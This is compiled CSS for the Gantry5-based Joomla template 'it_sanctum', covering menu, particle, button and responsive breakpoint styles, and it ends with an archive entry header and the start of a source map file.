.g-our-team.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slider.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover, .g-our-team-slideset.style3 .g-our-team-item:hover .g-info-container .g-our-team-name a:hover {
  text-decoration: underline;
}
/* line 4, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul {
  margin: 0;
  list-style: none;
  background: #fff;
  border: 1px solid #ddd;
  border-radius: 3px;
}
/* line 11, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a {
  padding: 0.625rem 1.25rem;
  color: #959595;
  display: block;
  border-bottom: 1px solid #ddd;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 18, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a:hover {
  background: #ddd;
  color: #626262;
}
/* line 22, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li a i {
  margin-right: 5px;
}
/* line 26, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom: none;
}
/* line 31, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu {
  border: none;
  display: none;
}
/* line 34, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active {
  display: block;
}
/* line 36, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu.uk-active a {
  padding-left: 35px;
}
/* line 40, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 41, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li .submenu li:last-child {
  border-bottom: 1px solid #ddd;
}
/* line 46, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
/* line 47, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active > a {
  background: #ddd;
  color: #4f953b;
}
/* line 51, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu {
  display: block;
}
/* line 53, templates/it_sanctum/scss/sanctum/_onepage-menu.scss */
.g-onepage-menu ul li.uk-active .submenu a {
  padding-left: 35px;
}
/* line 2, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro {
  margin-bottom: 3rem;
  text-align: center;
}
/* line 6, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-particle-intro {
  margin-bottom: 3rem;
}
/* line 9, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-main-title {
  margin-bottom: 0;
}
/* line 12, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator {
  height: 1px;
  width: 70px;
  margin: 20px auto;
  background: #ddd;
}
/* line 17, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .g-particle-intro .g-title-separator.no-intro-text {
  margin: 2.5rem auto 0;
}
/* line 24, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 25, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 26, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
#g-to-top .style1 #g-totop-button {
  border-radius: 0;
}
/* line 32, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 33, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-item {
  box-shadow: none;
  border-radius: 0;
}
/* line 37, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image {
  position: relative;
}
/* line 39, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image img {
  border-radius: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 0;
}
/* line 46, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 50, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link {
  font-style: initial;
  border-bottom: 1px solid #4f953b;
  display: inline-block;
}
/* line 55, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-image-features .g-image-features-link i {
  display: none;
}
/* line 61, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 0;
}
/* line 65, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 66, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 67, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features-particle .g-features-particle-item:hover .g-circle-border {
  border-color: #ddd;
}
/* line 74, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 75, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 76, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-features2-particle.style5 .g-features2-particle-icon {
  border-radius: 0;
}
/* line 82, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 83, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .g-slideshow-title, .g-slideshow .g-slideshow-desc {
    display: initial;
  }
}
/* line 90, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-overlay-background {
  background: transparent;
}
/* line 93, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 94, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-title {
  font-size: 3rem;
  color: #959595 !important;
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-title {
    font-size: 1rem;
  }
}
/* line 101, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .style2 .g-slideshow-desc {
  font-size: 3rem;
  background: #4f953b;
  font-family: "Cormorant SC";
}
@media only all and (max-width: 47.938rem) {
  .g-slideshow .style2 .g-slideshow-desc {
    font-size: 1rem;
    display: initial;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 112, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
  .g-slideshow .uk-slideshow > li {
    min-height: 300px;
  }
}
/* line 116, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-slideshow .uk-dotnav {
  margin-left: -15px;
}
/* line 121, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item, .g-content-pro-slider .g-content-pro-item, .g-content-pro-slideset .g-content-pro-item {
  border: 1px solid #ddd;
}
/* line 125, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slider .g-content-pro-item .uk-overlay-bottom, .g-content-pro-slideset .g-content-pro-item .uk-overlay-bottom {
  top: 0px;
}
/* line 129, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 130, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-content-pro-item, .g-content-pro-slider.style3 .g-content-pro-item, .g-content-pro-slideset.style3 .g-content-pro-item {
  border: none;
}
/* line 133, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2, .g-content-pro-slider.style3 .g-info-container-style2, .g-content-pro-slideset.style3 .g-info-container-style2 {
  background: rgba(255, 255, 255, 0.9);
  border: 0px;
  margin: 1.5rem;
  display: -webkit-box;
  display: -moz-box;
  display: box;
  display: -webkit-flex;
  display: -moz-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -moz-box-align: center;
  box-align: center;
  -webkit-align-items: center;
  -moz-align-items: center;
  -ms-align-items: center;
  -o-align-items: center;
  align-items: center;
  -ms-flex-align: center;
  -webkit-align-content: center;
  -moz-align-content: center;
  align-content: center;
  -ms-flex-line-pack: center;
  -webkit-box-lines: multiple;
  -moz-box-lines: multiple;
  box-lines: multiple;
  -webkit-flex-wrap: wrap;
  -moz-flex-wrap: wrap;
  -ms-flex-wrap: wrap;
  flex-wrap: wrap;
}
/* line 142, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title {
  margin: 0 auto;
}
/* line 144, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a {
  color: #4f953b;
}
/* line 146, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 151, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-title:after, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-title:after {
  content: "";
  width: 70px;
  height: 1px;
  display: block;
  background: #4f953b;
  margin: 1rem auto;
}
/* line 160, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-desc, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-desc {
  color: #959595;
}
/* line 163, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-special, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-special {
  color: #959595;
}
/* line 166, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a, .g-content-pro-slider.style3 .g-info-container-style2 a, .g-content-pro-slideset.style3 .g-info-container-style2 a {
  color: #4f953b;
}
/* line 168, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 a:hover, .g-content-pro-slider.style3 .g-info-container-style2 a:hover, .g-content-pro-slideset.style3 .g-info-container-style2 a:hover {
  text-decoration: none;
  color: #325e25;
}
/* line 173, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 174, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slider.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content, .g-content-pro-slideset.style3 .g-info-container-style2 .g-content-pro-image .uk-overlay-area-content {
  display: inline-block !important;
}
/* line 180, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-content-pro .uk-overlay-background, .g-content-pro-slider .uk-overlay-background, .g-content-pro-slideset .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 186, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 187, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item {
  margin-bottom: 10px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title {
  background: #fff;
  padding: 0.675rem 1rem;
  border-radius: 0;
  margin-bottom: 0;
  -webkit-transition: all, 0.2s;
  -moz-transition: all, 0.2s;
  transition: all, 0.2s;
}
/* line 194, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-title:hover, .g-accordion .g-accordion-item .uk-accordion-title.uk-active {
  border: 1px solid #ddd;
  background: transparent;
}
/* line 200, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item .uk-accordion-content {
  color: #fff;
  background: rgba(0, 0, 0, 0.8);
  padding: 15px;
}
/* line 206, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-accordion .g-accordion-item:last-child {
  margin-bottom: 0;
}
/* line 212, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul {
  border-radius: 0;
}
/* line 216, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 217, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a {
  padding: 1rem;
}
/* line 219, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li a:hover {
  color: #fff;
  background: #4f953b;
}
/* line 224, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 225, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:first-child a {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}
/* line 229, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 230, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li:last-child a {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
/* line 234, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 235, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul li.uk-active > a {
  color: #fff;
  background: #4f953b;
}
/* line 241, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 242, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 243, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-onepage-menu ul .submenu li a {
  border-radius: 0;
  padding: 1rem;
}
/* line 252, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 253, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 254, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-filter.uk-subnav-pill > * > * {
  border-radius: 0;
}
/* line 258, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 259, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 260, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
.g-portfolio .g-portfolio-item .g-portfolio-image .uk-overlay-background {
  background: rgba(79, 149, 59, 0.5);
  border: 20px solid #fff;
}
/* line 268, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 270, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
/* line 271, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle {
  color: #008056;
}
/* line 273, templates/it_sanctum/scss/sanctum/_particle-overrides.scss */
body .offcanvas-toggle-particle.g-offcanvas-toggle:hover {
  color: #4f953b;
}
/* line 2, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn, #g-offcanvas .btn {
  display: inline-block;
  padding: 0.5rem 1rem;
  border-radius: 0;
  color: #959595;
  background: transparent;
  border: 1px solid #bbb;
  line-height: 1.5;
  font-size: 0.9rem;
  vertical-align: middle;
  text-shadow: none;
  box-shadow: none;
  text-align: center;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
/* line 17, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:hover, #g-offcanvas .btn:hover {
  background: #959595;
  color: #fff;
  border-color: #959595;
}
/* line 22, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn:active, #g-offcanvas .btn:active, #g-page-surround .btn:focus, #g-offcanvas .btn:focus {
  background: #959595;
  color: #fff;
}
/* line 26, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary, #g-offcanvas .btn.btn-primary {
  color: #fff;
  background: #4f953b;
  border: 1px solid #4f953b;
}
/* line 30, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-primary:hover, #g-offcanvas .btn.btn-primary:hover, #g-page-surround .btn.btn-primary:active, #g-offcanvas .btn.btn-primary:active, #g-page-surround .btn.btn-primary:focus, #g-offcanvas .btn.btn-primary:focus {
  background: #282828;
  color: #fff;
  border: 1px solid #282828;
}
/* line 36, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info, #g-offcanvas .btn.btn-info {
  color: #fff;
  background: #5bc0de;
  border-color: #5bc0de;
}
/* line 40, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-info:hover, #g-offcanvas .btn.btn-info:hover, #g-page-surround .btn.btn-info:active, #g-offcanvas .btn.btn-info:active, #g-page-surround .btn.btn-info:focus, #g-offcanvas .btn.btn-info:focus {
  background: #85d0e7;
  border-color: #85d0e7;
}
/* line 45, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success, #g-offcanvas .btn.btn-success {
  color: #fff;
  background: #2ecc71;
  border-color: #2ecc71;
}
/* line 49, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-success:hover, #g-offcanvas .btn.btn-success:hover, #g-page-surround .btn.btn-success:active, #g-offcanvas .btn.btn-success:active, #g-page-surround .btn.btn-success:focus, #g-offcanvas .btn.btn-success:focus {
  background: #54d98c;
  border-color: #54d98c;
}
/* line 54, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning, #g-offcanvas .btn.btn-warning {
  color: #fff;
  background: #f39c12;
  border-color: #f39c12;
}
/* line 58, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-warning:hover, #g-offcanvas .btn.btn-warning:hover, #g-page-surround .btn.btn-warning:active, #g-offcanvas .btn.btn-warning:active, #g-page-surround .btn.btn-warning:focus, #g-offcanvas .btn.btn-warning:focus {
  background: #f5b043;
  border-color: #f5b043;
}
/* line 63, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger, #g-offcanvas .btn.btn-danger {
  color: #fff;
  background: #c0392b;
  border-color: #c0392b;
}
/* line 67, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-danger:hover, #g-offcanvas .btn.btn-danger:hover, #g-page-surround .btn.btn-danger:active, #g-offcanvas .btn.btn-danger:active, #g-page-surround .btn.btn-danger:focus, #g-offcanvas .btn.btn-danger:focus {
  background: #d65548;
  border-color: #d65548;
}
/* line 72, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse, #g-offcanvas .btn.btn-inverse {
  color: #fff;
  background: #2c3e50;
  border-color: #2c3e50;
}
/* line 76, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-inverse:hover, #g-offcanvas .btn.btn-inverse:hover, #g-page-surround .btn.btn-inverse:active, #g-offcanvas .btn.btn-inverse:active, #g-page-surround .btn.btn-inverse:focus, #g-offcanvas .btn.btn-inverse:focus {
  background: #3e5871;
  border-color: #3e5871;
}
/* line 81, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link, #g-offcanvas .btn.btn-link {
  color: #4f953b;
  background: transparent;
  border: none;
  padding: initial;
}
/* line 86, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-link:hover, #g-offcanvas .btn.btn-link:hover, #g-page-surround .btn.btn-link:active, #g-offcanvas .btn.btn-link:active, #g-page-surround .btn.btn-link:focus, #g-offcanvas .btn.btn-link:focus {
  color: #325e25;
}
/* line 90, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn.btn-large, #g-offcanvas .btn.btn-large {
  font-size: 1.125rem;
  padding: 0.8rem 1.3rem;
}
/* line 96, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 97, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn, #g-offcanvas .btn-group > .btn {
  border-radius: 0;
}
/* line 100, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:first-child, #g-offcanvas .btn-group > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
/* line 103, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .btn-group > .btn:last-child, #g-offcanvas .btn-group > .btn:last-child {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
/* line 109, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 110, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn, #g-offcanvas .readmore .btn, #g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  background: #4f953b;
  color: #fff;
  border: none;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 115, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .readmore .btn:hover, #g-offcanvas .readmore .btn:hover, #g-page-surround .search-form-results .btn:hover, #g-offcanvas .search-form-results .btn:hover, #g-page-surround .readmore .btn:active, #g-offcanvas .readmore .btn:active, #g-page-surround .search-form-results .btn:active, #g-offcanvas .search-form-results .btn:active, #g-page-surround .readmore .btn:focus, #g-offcanvas .readmore .btn:focus, #g-page-surround .search-form-results .btn:focus, #g-offcanvas .search-form-results .btn:focus {
  background: #282828;
  color: #fff;
}
/* line 121, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
/* line 122, templates/it_sanctum/scss/sanctum/_bs-buttons.scss */
#g-page-surround .search-form-results .btn, #g-offcanvas .search-form-results .btn {
  line-height: 1.5;
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container {
  width: 75rem;
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  .g-container {
    width: 60rem;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .g-container {
    width: 48rem;
  }
}
@media only all and (min-width: 30.062rem) and (max-width: 47.938rem) {
  .g-container {
    width: 30rem;
  }
}
@media only all and (max-width: 30rem) {
  .g-container {
    width: 100%;
  }
}
/* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
.g-container.g-flushed {
  width: 100%;
}
/* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  .g-block {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
  }
}
/* line 30, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
@media only all and (max-width: 47.938rem) {
  body [class*="size-"] {
    -webkit-flex-grow: 0;
    -moz-flex-grow: 0;
    flex-grow: 0;
    -ms-flex-positive: 0;
    -webkit-flex-basis: 100%;
    -moz-flex-basis: 100%;
    flex-basis: 100%;
    -ms-flex-preferred-size: 100%;
    max-width: 100%;
  }
}
@media only all and (max-width: 47.938rem) {
  @supports not (flex-wrap: wrap) {
    /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-grid {
      display: block;
      -webkit-box-lines: inherit;
      -moz-box-lines: inherit;
      box-lines: inherit;
      -webkit-flex-wrap: inherit;
      -moz-flex-wrap: inherit;
      -ms-flex-wrap: inherit;
      flex-wrap: inherit;
    }
    /* line 45, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_flex.scss */
    .g-block {
      display: block;
      -webkit-box-flex: inherit;
      -moz-box-flex: inherit;
      box-flex: inherit;
      -webkit-flex: inherit;
      -moz-flex: inherit;
      -ms-flex: inherit;
      flex: inherit;
    }
  }
}
/* line 2, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
.visible-large, .visible-desktop, .visible-tablet, .visible-phone, .g-block.visible-large, .g-block.visible-desktop, .g-block.visible-tablet, .g-block.visible-phone {
  display: none !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 14, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-phone {
    display: block !important;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-phone {
    display: block !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 23, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-tablet {
    display: block !important;
  }
  /* line 26, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-tablet {
    display: block !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 32, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 35, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 41, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-large {
    display: block !important;
  }
  /* line 44, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-large {
    display: block !important;
  }
  /* line 47, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .visible-desktop {
    display: block !important;
  }
  /* line 50, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .g-block.visible-desktop {
    display: block !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 57, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-phone {
    display: none !important;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 63, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-tablet {
    display: none !important;
  }
}
@media only all and (min-width: 60rem) and (max-width: 74.938rem) {
  /* line 69, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (min-width: 75rem) {
  /* line 75, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-large {
    display: none !important;
  }
  /* line 78, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .hidden-desktop {
    display: none !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 85, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-right {
    text-align: inherit !important;
  }
  /* line 88, media/gantry5/engines/nucleus/scss/nucleus/theme/breakpoints/_utilities.scss */
  .align-left {
    text-align: inherit !important;
  }
}
/*# sourceMappingURL=sanctum__offline.css.map */PK!K|DA<A<5it_sanctum/custom/css-compiled/sanctum-joomla.css.mapnu&1i�{"version":3,"sourceRoot":"\/","sources":["\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_nav.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_utilities.scss","\/media\/gantry5\/engines\/nucleus\/scss\/joomla\/theme\/_forms.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_core.scss","\/media\/gantry5\/engines\/nucleus\/scss\/nucleus\/mixins\/_breakpoints.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_typography.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_forms.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_tabs.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_utilities.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_contacts.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_breadcrumb.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_blog.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_revolution.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_nssp2.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_search.scss","\/templates\/it_sanctum\/scss\/sanctum-joomla\/_uikit.scss","\/media\/gantry5\/engines\/nucleus\/scss\/joomla\/theme\/breakpoints\/_bootstrap.scss","\/media\/gantry5\/engines\/nucleus\/scss\/joomla\/theme\/breakpoints\/_forms.scss","\/media\/gantry5\/engines\/nucleus\/scss\/joomla\/theme\/breakpoints\/_utilities.scss"],"names":[],"mappings":"AACA,yEAAA;AAUA,0EAAA;ACVA,+EAAA;AA